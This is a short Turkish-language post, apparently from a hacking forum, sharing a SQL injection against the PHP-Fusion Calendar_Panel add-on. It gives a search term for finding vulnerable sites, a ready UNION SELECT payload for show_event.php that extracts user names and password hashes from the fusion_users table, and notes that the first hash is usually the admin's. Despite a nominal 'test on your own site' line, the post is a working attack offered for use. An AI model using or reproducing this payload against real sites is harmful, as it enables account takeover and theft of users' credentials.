önemli not:lütfen bu açığı kendi php-fusion sitenizde sınayın
bu yöntem acaip işime yaramıştı yayınlıyayım dedim
arama:’Calendar_Panel’
enjekte kodu:show_event.php?m_month=-1/**/UNIon/**/SELECT/**/0,1,user_password,user_name,4,5,6,7,8,9,10,11/**/FROM/**/fusion_users/*
site adresi.com/infusions/calendar_panel/show_event.php...
enjekte kodumuzu show.even.php yerini silip oraya koyuyoruz ve md5ler gelio genellikle en üstteki adminindir